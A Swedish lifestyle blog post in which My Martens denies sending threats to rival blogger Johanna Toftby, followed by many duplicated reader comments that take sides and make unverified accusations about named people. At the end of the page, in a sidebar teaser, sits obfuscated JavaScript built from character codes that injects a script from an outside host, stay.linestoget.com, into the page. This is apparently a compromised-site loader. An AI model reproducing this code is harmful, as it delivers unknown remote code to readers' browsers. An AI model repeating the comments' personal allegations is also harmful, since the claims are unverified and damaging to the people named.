Godmorgon – Toftby DEL 2

 my martens

Nu har det smattrat till i inboxen igen efter Toftbys senaste inlägg. När jag gjorde mitt inlägg (läs HÄR) så var det för att måttet var och är rågat, jag gick emot mina egna principer då jag sällan brukar bemöta påhopp och kränkningar.

 Det här är första gången jag satt ner foten och sagt ifrån. Men jag har uppenbarligen trampat på en öm tå när hundratals människor hört av sig och berättat om sina egna erfarenheter om Toftby. 

Men nu får jag frågor om Toftbys inlägg, om det är jag som ligger bakom hot och brev?
-NEJ, GIVETVIS INTE!! Vad det gäller brev och hot så har det pågått under en lång period enligt Toftby själv.
Jag har INGENTING med det hon beskriver i sitt inlägg, att göra. 

my martens 2

Jag blickar framåt och andas in bra energi! Att vara positiv bringar så mycket kärlek i livet…

Nu väntar en fullspäckad dag med möten i storstan! 

 Kram / My Martens

147 Komentarer

 1. Detta är ju sjukt att man ska behöva ta emot skit via mail på grund av en annan person.
  Men jag gillar att du är så positiv som du är, kämpa! <3
  Och va snygg du är i håret, ha en fantastisk dag!
  Kramar

 2. Hej My
  Fick höra att du gjort ytterligare ett inlägg till om Johanna och läste din text. På vilket sätt känner du dig utpekad? Ingenstans nämns ditt namn utan det skrivs om att stävja näthat istället för att uppmuntra till det. Att det börjar bli dags att städa upp bland påhopp i det offentliga rummet, står du inte bakom det?
  Inlägget handlar bara om detta, allt annat är personliga tolkningar.
  Hälsningar Janne

  • Men vet du vad Janne, du kanske ska ta bort din kommentar inne på Johannas instagram där du påstår att JAG ligger bakom förtalet mot Johanna just nu! Jag har fått massor av mail och sms ang din kommentar där. Hoppas Polisen sätter dit den ynkliga människan som hotat Johanna under lång tid!

  • OM du läser vad My skriver så skriver hon enbart att hennes inbox varit full av frågor om det är My som ligger bakom hoten…inget annat!!

  • Nedan följer vad jag tror är anledning till att stackar My får ta emot dessa hemska mejl om att det skulle vara hennes fel.
   Utdrag från Johannas blogginlägg:
   ”Personer jag inte känner har bildat sig en uppfattning om mig utifrån vad andra tycker och uppfattar. Att uppmuntra och hetsa till ännu mer näthat är något vi alla bloggare och skribenter är emot. Men långt ifrån alla väljer att hantera det och det kan lätt bli en lavin av hat och hårda ord.”
   samt
   ”Hur tänker man som läsare när man delar vidare den där länken från en artikel eller blogginlägg där man inte brytt sig om att ta reda på hela sanningen?”
   Självklart pekas hon inte ut med namn men för oss läsare är det väldigt uppenbart.

  • Men snälla det står ju i My´s inlägg klart och tydligt att de smattrat en massa in i hennes inbox …där folk hör av sig och frågat om hon har något med det och göra. Kan du inte läsa

  • Hon har ju antagligen fått mail ifrån johanna s läsare och vill bara förtydliga att hon inte har med detta att göra och Johanna kan faktiskt hetsa i sina kommentarer i sin blogna g och instagram om andra saker, hon är extremt otrevlig och taskig ibland själv emot sina läsare,,, som inte har samma åsikt,, och själv fick jag höra att jag och flera var en bittra kärringarsom kunde dra åt helvete för vi ifrågasätte vissa saker och nej jag var inte otrevlig överhuvudtaget,, finns faktiskt något som heter konstruktiv kritik!!!!!!

  • Janne – du får nog läsa VAD My har skrivit. Där står ju faktiskt att hon har fått många frågor om det är hon som ligger bakom hoten.

 3. Dessa hotbrev är förskräckliga!!! Ingen ska behöva få sånt! Men har så klart INGET med DIG och ditt blogginlägg att göra. Toftby har fått dessa hotbrev under en längre period. Hon visade mig dessa brev och berättade om hoten förra sommaren när vi var i Kina. Stå på dig My!!! Puss

 4. Läst dina båda inlägg om Toftby och det bekräftade en känsla jag haft om henne. Fortsätt på den positiva vägen, gillar det du gör!
  Kram på dig!

  • Men på riktigt, hur svårt är det för er familj att låta My vara ifred. Det är ju egentligen det enda hon ber om, ändå så fortsätter ni att kommentera hennes blogg och instagram.
   Jag säger inte att den ena eller andra är bättre eller sämre, men på riktigt, om en människa ber att få bli lämnad ifred av er så kan man väl bara göra det?

  • Usch, det där var lågt faktiskt,,, du kan faktiskt inte lägga skulden på My om detta,, hon har rätt precis som Johanna att uttrycka sig i sin blogg och lika lite som Johanna kan påverka sina läsare vad de gör efter sina inlägg så kan inte My påverka sina läsare,,,, Nä dålig stil

  • Linnea; alla läsare bildar sig en uppfattning om alla bloggare. Den här personen har säkert stört sig på Johanna innan My skrev detta på sin blogg. Förstår inte denna pajkastning Ni anser ju att My är orsaken till detta…vilket resulterar till mera hets till näthatet! Glöm inte det och Lycka till med att hitta den/ dom skyldiga.

 5. Men shit vad det ska vara svårt att bara få leva sitt liv då. Vad hemskt att du ska få förklara dig hela tiden, bara för hur en annan människa beter sig. Och att man ens tror att du, du av alla, skulle kunna skicka hotbrev. Du verkar vara så snäll och go av dig som person, så mjuk på något sätt.
  In med positiv energi och ut med negativt skit och släpp det. Vi vet att det inte är du, det är bara människor som vill provocera. ?
  Jättefin fläta!
  Ha en fin dag vackra.

 6. Detta är ju sjukt att man ska behöva ta emot skit via mail på grund av en annan person.
  Men jag gillar att du är så positiv som du är, kämpa! <3

  Och va snygg du är i håret, ha en fantastisk dag!

  Kramar

 7. Hej My

  Fick höra att du gjort ytterligare ett inlägg till om Johanna och läste din text. På vilket sätt känner du dig utpekad? Ingenstans nämns ditt namn utan det skrivs om att stävja näthat istället för att uppmuntra till det. Att det börjar bli dags att städa upp bland påhopp i det offentliga rummet, står du inte bakom det?
  Inlägget handlar bara om detta, allt annat är personliga tolkningar.

  Hälsningar Janne

  • Men vet du vad Janne, du kanske ska ta bort din kommentar inne på Johannas instagram där du påstår att JAG ligger bakom förtalet mot Johanna just nu! Jag har fått massor av mail och sms ang din kommentar där. Hoppas Polisen sätter dit den ynkliga människan som hotat Johanna under lång tid!

  • OM du läser vad My skriver så skriver hon enbart att hennes inbox varit full av frågor om det är My som ligger bakom hoten…inget annat!!

  • Nedan följer vad jag tror är anledning till att stackar My får ta emot dessa hemska mejl om att det skulle vara hennes fel.
   Utdrag från Johannas blogginlägg:
   ”Personer jag inte känner har bildat sig en uppfattning om mig utifrån vad andra tycker och uppfattar. Att uppmuntra och hetsa till ännu mer näthat är något vi alla bloggare och skribenter är emot. Men långt ifrån alla väljer att hantera det och det kan lätt bli en lavin av hat och hårda ord.”
   samt
   ”Hur tänker man som läsare när man delar vidare den där länken från en artikel eller blogginlägg där man inte brytt sig om att ta reda på hela sanningen?”

   Självklart pekas hon inte ut med namn men för oss läsare är det väldigt uppenbart.

  • Men snälla det står ju i My´s inlägg klart och tydligt att de smattrat en massa in i hennes inbox …där folk hör av sig och frågat om hon har något med det och göra. Kan du inte läsa

  • Hon har ju antagligen fått mail ifrån johanna s läsare och vill bara förtydliga att hon inte har med detta att göra och Johanna kan faktiskt hetsa i sina kommentarer i sin blogna g och instagram om andra saker, hon är extremt otrevlig och taskig ibland själv emot sina läsare,,, som inte har samma åsikt,, och själv fick jag höra att jag och flera var en bittra kärringarsom kunde dra åt helvete för vi ifrågasätte vissa saker och nej jag var inte otrevlig överhuvudtaget,, finns faktiskt något som heter konstruktiv kritik!!!!!!

  • Janne – du får nog läsa VAD My har skrivit. Där står ju faktiskt att hon har fått många frågor om det är hon som ligger bakom hoten.

 8. Dessa hotbrev är förskräckliga!!! Ingen ska behöva få sånt! Men har så klart INGET med DIG och ditt blogginlägg att göra. Toftby har fått dessa hotbrev under en längre period. Hon visade mig dessa brev och berättade om hoten förra sommaren när vi var i Kina. Stå på dig My!!! Puss

 9. Alltså jag blir mörkrädd av att läsa alla kommentarer, fam Tofty o Janne kan ni inte bara låta My vara ifred, det enda hon ber om, ni håller ju liv i allt ”näthat” och vräker ur er både det ena o andra. Se almerings inlägg ! Så oskyldiga är ni inte. Sluta nu alla!!

 10. Läst dina båda inlägg om Toftby och det bekräftade en känsla jag haft om henne. Fortsätt på den positiva vägen, gillar det du gör!
  Kram på dig!

  • Men på riktigt, hur svårt är det för er familj att låta My vara ifred. Det är ju egentligen det enda hon ber om, ändå så fortsätter ni att kommentera hennes blogg och instagram.
   Jag säger inte att den ena eller andra är bättre eller sämre, men på riktigt, om en människa ber att få bli lämnad ifred av er så kan man väl bara göra det?

  • Usch, det där var lågt faktiskt,,, du kan faktiskt inte lägga skulden på My om detta,, hon har rätt precis som Johanna att uttrycka sig i sin blogg och lika lite som Johanna kan påverka sina läsare vad de gör efter sina inlägg så kan inte My påverka sina läsare,,,, Nä dålig stil

  • Linnea; alla läsare bildar sig en uppfattning om alla bloggare. Den här personen har säkert stört sig på Johanna innan My skrev detta på sin blogg. Förstår inte denna pajkastning Ni anser ju att My är orsaken till detta…vilket resulterar till mera hets till näthatet! Glöm inte det och Lycka till med att hitta den/ dom skyldiga.

 11. Men shit vad det ska vara svårt att bara få leva sitt liv då. Vad hemskt att du ska få förklara dig hela tiden, bara för hur en annan människa beter sig. Och att man ens tror att du, du av alla, skulle kunna skicka hotbrev. Du verkar vara så snäll och go av dig som person, så mjuk på något sätt.
  In med positiv energi och ut med negativt skit och släpp det. Vi vet att det inte är du, det är bara människor som vill provocera. 😉

  Jättefin fläta!
  Ha en fin dag vackra.

 12. Jag är helt övertygad om att Johanna Toftby är inne och läser alla kommentarer här så jag skulle vilja rikta mig till dig. Varför inte lyssna på kritiken mot dig som flera har beskrivit? Kanske att du varit lite väl hård mot människor i din omgivning? Kanske att du slängt ur dig onödiga och elaka kommentarer? Kanske att du faktiskt lurat folk och ljugit..? Om det är så se till att bättra dig, finns ju ett talesätt ”som man bäddar får man ligga” Tycker det låter som att det är många fler än My som tröttnat och nu står på hennes sida och säger ifrån. Mitt tips till dig är därför enkelt…be om ursäkt! Skicka inte din syster, vännina och ”kille” att skriva ännu fler kommentarer. Det framstår bara som löjligt! En ursäkt med hopp om bättring och även lämna My ifred vore väl på sin plats? Hoppas verkligen ni kan reda ut detta på ett bra och vuxet sätt så ni båda kan lägga detta bakom er och gå vidare. Mvh Skövdebo

  • Såååå bra skrivet Annika!! Hoppas verkligen att det tar slut nu. Alla behöver nog tänka till o backa lite nu. Gör om o gör rätt. Kliv ner ett steg Johanna o tänk efter, allt gott.

  • Väldigt bra skrivit Annika.
   Konstigt att fröken Toftby helt plötsligt nu börjar agera mot detta näthat om det pågått länge.
   Tror nog att det är så att hon är livrädd nu när det kommit upp en del till ytan om hur hon behandlar människor och då måste skriva nått som gör att folket tycker synd om henne.
   Kanske vore nått att visa vad hon skrivit om dej om detta inte slutar.
   Kramar till dej My

  • Annika, är helt enig med dig! Otroligt bra skrivet.
   My, du kommer långt med att vara så positiv, driftig, ödmjuk och vacker <3 Alla som någon gång stött på dig eller följt dig på bloggen vet att du inte står bakom några hot. KRAM!

   • jag hoppas det…. det gjorde mig verkligen ledsen att så många verkade tro det. jag skulle verkligen ALDRIG göra så! Så jobbar inte jag! Tusen tack fina du <3 Kram

 13. Johanna får väl ändå skylla sig själv om det blivit mer hat emot henne. Knappast Mys fel för att hon säger ifrån. Skulle hon bara fortsatt att ta emot allt skit. Skulle någon annan tyckt att det är ok att bli behandlad på det viset.

 14. Fult det här att lägga ut hotbrev hon fått som pågått så länge och få det till att det är på grund av dig My hon fått dessa. Tycker inte Toftby hanterar detta bra. Hade varit bättre att lyfta luren och ringa både dig och Terece och reda ut det hon ställt till med. Skickar hela tiden Janne och sin bitska syster till försvar hela tiden. Så lågt. Har sett detta tidigare. Detta bekräftar ännu mer mina tankar jag haft om denna Toftby. Hon är inte ödmjuk alls och kan inte be om ursäkt och städa upp efter sig och gå vidare. Ingen bra attityd när man driver blogg och samarbeten. Framförallt inte att snacka skit om andra bloggare för gemensamma samarbetspartners. Det kommer ju till slut fram. Tycker hon kan ta ansvar för det hon ställt till med. Hoppas det löser sig för dig My och starkt av dig. Du har ju försökt få till en lösning men utan resultat. Det säger ju allt vad hon går för. Lycka till!

 15. Alltså jag blir mörkrädd av att läsa alla kommentarer, fam Tofty o Janne kan ni inte bara låta My vara ifred, det enda hon ber om, ni håller ju liv i allt ”näthat” och vräker ur er både det ena o andra. Se almerings inlägg ! Så oskyldiga är ni inte. Sluta nu alla!!

 16. Jag är helt övertygad om att Johanna Toftby är inne och läser alla kommentarer här så jag skulle vilja rikta mig till dig. Varför inte lyssna på kritiken mot dig som flera har beskrivit? Kanske att du varit lite väl hård mot människor i din omgivning? Kanske att du slängt ur dig onödiga och elaka kommentarer? Kanske att du faktiskt lurat folk och ljugit..? Om det är så se till att bättra dig, finns ju ett talesätt ”som man bäddar får man ligga” Tycker det låter som att det är många fler än My som tröttnat och nu står på hennes sida och säger ifrån. Mitt tips till dig är därför enkelt…be om ursäkt! Skicka inte din syster, vännina och ”kille” att skriva ännu fler kommentarer. Det framstår bara som löjligt! En ursäkt med hopp om bättring och även lämna My ifred vore väl på sin plats? Hoppas verkligen ni kan reda ut detta på ett bra och vuxet sätt så ni båda kan lägga detta bakom er och gå vidare. Mvh Skövdebo

  • Såååå bra skrivet Annika!! Hoppas verkligen att det tar slut nu. Alla behöver nog tänka till o backa lite nu. Gör om o gör rätt. Kliv ner ett steg Johanna o tänk efter, allt gott.

  • Väldigt bra skrivit Annika.
   Konstigt att fröken Toftby helt plötsligt nu börjar agera mot detta näthat om det pågått länge.
   Tror nog att det är så att hon är livrädd nu när det kommit upp en del till ytan om hur hon behandlar människor och då måste skriva nått som gör att folket tycker synd om henne.
   Kanske vore nått att visa vad hon skrivit om dej om detta inte slutar.
   Kramar till dej My

  • Annika, är helt enig med dig! Otroligt bra skrivet.

   My, du kommer långt med att vara så positiv, driftig, ödmjuk och vacker <3 Alla som någon gång stött på dig eller följt dig på bloggen vet att du inte står bakom några hot. KRAM!

   • jag hoppas det…. det gjorde mig verkligen ledsen att så många verkade tro det. jag skulle verkligen ALDRIG göra så! Så jobbar inte jag! Tusen tack fina du <3 Kram

 17. Jag kanske tänker annorlunda än alla andra, jag skulle aldrig skriva ett sånt inlägg om jag fått nog, pga att det skulle bli enormt mycket förstorat, det blir ju knappast bättre, vilket det tydligen inte blev, blir lite att man kastar bensin på elden.
  Hoppas att alla läsare kan tänka till o sluta skriva en massa hat, My eller Johanna lär ju aldrig få det lugnt om det ska fortsätta så här.
  Jag följer inte nån av bloggarna slaviskt utan är in o läser då o då, men jag kanske har missat att Johanna skrivit inlägg om My?
  En annan sak jag tänkte på när jag läste ditt förra inlägg va att du skrev att Johanna hade skrivit nåt om att det inte finns genvägar utan bara träning när du hade opererat dig, men det skrev ju din vän också, ett långt inlägg.
  Jag vet inte allt som hänt mellan dig o Johanna o förstår att du fått nog, men ibland får man försöka att inte ta åt sig när andra skriver om sånt du känner dig träffad på, även om det är svårt, många bloggar om samma saker.
  Hoppas att det blir lugnt snart o allt lägger sig och att ni får reda ut detta själva, så man får läsa lite glada inlägg igen =)
  Ha en fortsatt härlig dag

  • Det hoppas jag verkligen att det blir. Efter 2.5 år (ja du läser rätt) så är jag mer än mättad och trött på Toftbys elaka påhopp, kommateringar, skitsnack och elaka mail till gemensamma samarbetspartner. Lugn och ro är PRECIS vad jag behöver <3 Detsamma till dig! Kram

   • Så länge som 2,5 år??? Ja då förstår jag verkligen att du fått nog. Så som hon sitter och snackar om näthat hon drabbas av på sin blogg!! Själv är hon otrevlig mot bloggläsare och även då mot dig. Alla andra blir anklagade för både det ena och det andra men hon själv kan bete sig precis hur som helst. Vilken dubbelmoral! Ja ja hoppas det löser sig på bästa sätt och att ”terriern” lugnar ner sig ? Du verkar ha ett gott hjärta och jag tror inte det var ett lätt beslut för dig att gå ut så här men det var starkt av dig. Vem går liksom ut så här om man inte har ordentligt på fötterna? Ha det gott och lycka till!

 18. Johanna får väl ändå skylla sig själv om det blivit mer hat emot henne. Knappast Mys fel för att hon säger ifrån. Skulle hon bara fortsatt att ta emot allt skit. Skulle någon annan tyckt att det är ok att bli behandlad på det viset.

 19. My! Jag tycker du är en stark och inspirerande person! Tråkigt med detta näthat. Tror att många stör sig på Toftby just för att hon bara lägger ut positiva saker och aldrig skriver något som är jobbigt. Skrev detta på hennes blogg men den kommentaren publicerade hon inte. Hon skriver om sitt nyttiga liv men dricker alkohol typ varje dag. När någon påpekar detta ryter hon själv ifrån. Det blir så fejk då. Gillar mer Maggan Graafs blogg och din som är äkta och skildrar vardagen.
  Företaget jag jobbade på samarbetade med Johanna och hon var ganska virrig och tvungen att fråga Janne om allt hela tiden. Men annars var hon trevlig.

  • Åhhhh! Tack snälla du =) Vad glad jag blir utav dina ord <3 Det BEHÖVDE jag idag! -Tack <3 Ps det är ju kontrasterna som gör det, en dålig dag gör ju att man uppskattar en bra dag ? kram

 20. Fult det här att lägga ut hotbrev hon fått som pågått så länge och få det till att det är på grund av dig My hon fått dessa. Tycker inte Toftby hanterar detta bra. Hade varit bättre att lyfta luren och ringa både dig och Terece och reda ut det hon ställt till med. Skickar hela tiden Janne och sin bitska syster till försvar hela tiden. Så lågt. Har sett detta tidigare. Detta bekräftar ännu mer mina tankar jag haft om denna Toftby. Hon är inte ödmjuk alls och kan inte be om ursäkt och städa upp efter sig och gå vidare. Ingen bra attityd när man driver blogg och samarbeten. Framförallt inte att snacka skit om andra bloggare för gemensamma samarbetspartners. Det kommer ju till slut fram. Tycker hon kan ta ansvar för det hon ställt till med. Hoppas det löser sig för dig My och starkt av dig. Du har ju försökt få till en lösning men utan resultat. Det säger ju allt vad hon går för. Lycka till!

 21. Ingen är sämre än att den kan ändra på sig. Så även Johanna! Men såna inlägg som hon dundrar fram med är inte okej! Stå på dig My!

  • Håller fullständigt med dig! Jag är dessutom inte den som är den, jag skulle absolut kunna ge Johanna en ”andra chans” om hon var intresserad utgav det och bevisade det…

 22. Jag kanske tänker annorlunda än alla andra, jag skulle aldrig skriva ett sånt inlägg om jag fått nog, pga att det skulle bli enormt mycket förstorat, det blir ju knappast bättre, vilket det tydligen inte blev, blir lite att man kastar bensin på elden.

  Hoppas att alla läsare kan tänka till o sluta skriva en massa hat, My eller Johanna lär ju aldrig få det lugnt om det ska fortsätta så här.

  Jag följer inte nån av bloggarna slaviskt utan är in o läser då o då, men jag kanske har missat att Johanna skrivit inlägg om My?

  En annan sak jag tänkte på när jag läste ditt förra inlägg va att du skrev att Johanna hade skrivit nåt om att det inte finns genvägar utan bara träning när du hade opererat dig, men det skrev ju din vän också, ett långt inlägg.

  Jag vet inte allt som hänt mellan dig o Johanna o förstår att du fått nog, men ibland får man försöka att inte ta åt sig när andra skriver om sånt du känner dig träffad på, även om det är svårt, många bloggar om samma saker.

  Hoppas att det blir lugnt snart o allt lägger sig och att ni får reda ut detta själva, så man får läsa lite glada inlägg igen =)

  Ha en fortsatt härlig dag

  • Det hoppas jag verkligen att det blir. Efter 2.5 år (ja du läser rätt) så är jag mer än mättad och trött på Toftbys elaka påhopp, kommateringar, skitsnack och elaka mail till gemensamma samarbetspartner. Lugn och ro är PRECIS vad jag behöver <3 Detsamma till dig! Kram

   • Så länge som 2,5 år??? Ja då förstår jag verkligen att du fått nog. Så som hon sitter och snackar om näthat hon drabbas av på sin blogg!! Själv är hon otrevlig mot bloggläsare och även då mot dig. Alla andra blir anklagade för både det ena och det andra men hon själv kan bete sig precis hur som helst. Vilken dubbelmoral! Ja ja hoppas det löser sig på bästa sätt och att ”terriern” lugnar ner sig 😉 Du verkar ha ett gott hjärta och jag tror inte det var ett lätt beslut för dig att gå ut så här men det var starkt av dig. Vem går liksom ut så här om man inte har ordentligt på fötterna? Ha det gott och lycka till!

 23. My! Jag tycker du är en stark och inspirerande person! Tråkigt med detta näthat. Tror att många stör sig på Toftby just för att hon bara lägger ut positiva saker och aldrig skriver något som är jobbigt. Skrev detta på hennes blogg men den kommentaren publicerade hon inte. Hon skriver om sitt nyttiga liv men dricker alkohol typ varje dag. När någon påpekar detta ryter hon själv ifrån. Det blir så fejk då. Gillar mer Maggan Graafs blogg och din som är äkta och skildrar vardagen.
  Företaget jag jobbade på samarbetade med Johanna och hon var ganska virrig och tvungen att fråga Janne om allt hela tiden. Men annars var hon trevlig.

  • Åhhhh! Tack snälla du =) Vad glad jag blir utav dina ord <3 Det BEHÖVDE jag idag! -Tack <3 Ps det är ju kontrasterna som gör det, en dålig dag gör ju att man uppskattar en bra dag 😉 kram

 24. Ingen är sämre än att den kan ändra på sig. Så även Johanna! Men såna inlägg som hon dundrar fram med är inte okej! Stå på dig My!

  • Håller fullständigt med dig! Jag är dessutom inte den som är den, jag skulle absolut kunna ge Johanna en ”andra chans” om hon var intresserad utgav det och bevisade det…

 25. Pust, säger jag bara !! Det verkar ju snarare som om dom vill hålla hatet vid liv och kommentaren från hennes syster att hotet skulle ha kommit efter ditt inlägg är ju en elak anklagelse. Försök My att skaka detta av dig <3

 26. MEN allvarligt Janne???? Du ber alla att dra som kommenterar nåt som inte passar ER på Johannas blogg med spydiga idiotförklarande kommentarer men själv är du och kommenterar på Mys blogg, dubbelmoral kallar jag det!!!! Fy skäms på dig!

 27. Du gör ett grymt bra jobb .Fortsätt och var den härliga och ärliga tjej du är. Det är ju ändå allt som är viktigast.Kram

 28. Pust, säger jag bara !! Det verkar ju snarare som om dom vill hålla hatet vid liv och kommentaren från hennes syster att hotet skulle ha kommit efter ditt inlägg är ju en elak anklagelse. Försök My att skaka detta av dig <3

 29. Stå på dig My! Och tack för en sån ärlig och fin blogg! Så trött att läsa allas ”perfekta” vardagsliv jämt… ALLT är inte perfekt och felfritt JÄMT. Tacka vet din och Magdalenas blogg. Läser era varje dag. Varma kramar

 30. MEN allvarligt Janne???? Du ber alla att dra som kommenterar nåt som inte passar ER på Johannas blogg med spydiga idiotförklarande kommentarer men själv är du och kommenterar på Mys blogg, dubbelmoral kallar jag det!!!! Fy skäms på dig!

 31. Du gör ett grymt bra jobb .Fortsätt och var den härliga och ärliga tjej du är. Det är ju ändå allt som är viktigast.Kram

  • Eller hur?! Skicka fram pojkvän och systrar att kommentera och själv försöka glorifiera sig själv genom bloggen, andras bloggar och media, ja jäklar vad pinsamt

   • Håller med! Den ursäkten som jag efterlyste igår känns som att den aldrig kommer komma. Däremot har namn som ”mark” och ”okej44” börjat dyka upp med kommentarer som man bara kan gissa var dom kommer ifrån..pinsamt!

   • Håller med! Nu har dessutom namn som ”mark” och ”okej44” börjat dyka upp, inte så svårt att räkna ut vilka som ligger bakom dom kommentarerna…pinsamt var ordet!

 32. Stå på dig My! Och tack för en sån ärlig och fin blogg! Så trött att läsa allas ”perfekta” vardagsliv jämt… ALLT är inte perfekt och felfritt JÄMT. Tacka vet din och Magdalenas blogg. Läser era varje dag. Varma kramar

  • Eller hur?! Skicka fram pojkvän och systrar att kommentera och själv försöka glorifiera sig själv genom bloggen, andras bloggar och media, ja jäklar vad pinsamt

   • Håller med! Den ursäkten som jag efterlyste igår känns som att den aldrig kommer komma. Däremot har namn som ”mark” och ”okej44” börjat dyka upp med kommentarer som man bara kan gissa var dom kommer ifrån..pinsamt!

   • Håller med! Nu har dessutom namn som ”mark” och ”okej44” börjat dyka upp, inte så svårt att räkna ut vilka som ligger bakom dom kommentarerna…pinsamt var ordet!

 33. Alltså detta är ju pinsamt? Vuxna människor som tjattrar som ett gäng apor; ’hon sa…’ ’då borde du…’
  Den ena värre än den andra! Väx upp och skaffa er lite integritet och varför inte ett LIV? Ta hand om era barn istället för att tjafsa som tonåringar på nätet, skäms på er!!!

 34. Alltså detta är ju pinsamt? Vuxna människor som tjattrar som ett gäng apor; ’hon sa…’ ’då borde du…’

  Den ena värre än den andra! Väx upp och skaffa er lite integritet och varför inte ett LIV? Ta hand om era barn istället för att tjafsa som tonåringar på nätet, skäms på er!!!

 35. Toftby och hennes controller är väl gamla nog att vara föräldrar till fina My? Pinsamt att en ung tjej som My är den enda vuxna i detta drama som Toftby har skapat. Stå på dig My! Du är underbar! Kram

 36. Hej My!
  Har nyss börjat läsa din blogg. Du inspirerar och ger positiv energi till dina läsare. Du svarar dina läsare med respekt, utan spydiga kommentarer. Det tyder..tycker jag på en stark självkänsla. Du verkar vara en go mysig tjej som står med både fötterna på jorden.
  Jag tror på karma. Vad man ger får man tillbaka.
  Lycka till med dina nya projekt
  Kram Andrea

 37. Toftby och hennes controller är väl gamla nog att vara föräldrar till fina My? Pinsamt att en ung tjej som My är den enda vuxna i detta drama som Toftby har skapat. Stå på dig My! Du är underbar! Kram

 38. Hej My!

  Har nyss börjat läsa din blogg. Du inspirerar och ger positiv energi till dina läsare. Du svarar dina läsare med respekt, utan spydiga kommentarer. Det tyder..tycker jag på en stark självkänsla. Du verkar vara en go mysig tjej som står med både fötterna på jorden.
  Jag tror på karma. Vad man ger får man tillbaka.
  Lycka till med dina nya projekt

  Kram Andrea

 39. Ni är båda fina mammor men vad tjänar det på att hänga ut varandra och allt på just nätet? Är det enda sättet att nå fram nuförtiden ? Ni båda föder hat!
  Om nu Tofty..gjort o sagt blablabla måste du föda det i media? Måste hon? = Jo, tydligen . Media och ännu mer /W

 40. Ni är båda fina mammor men vad tjänar det på att hänga ut varandra och allt på just nätet? Är det enda sättet att nå fram nuförtiden ? Ni båda föder hat!
  Om nu Tofty..gjort o sagt blablabla måste du föda det i media? Måste hon? = Jo, tydligen . Media och ännu mer /W

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/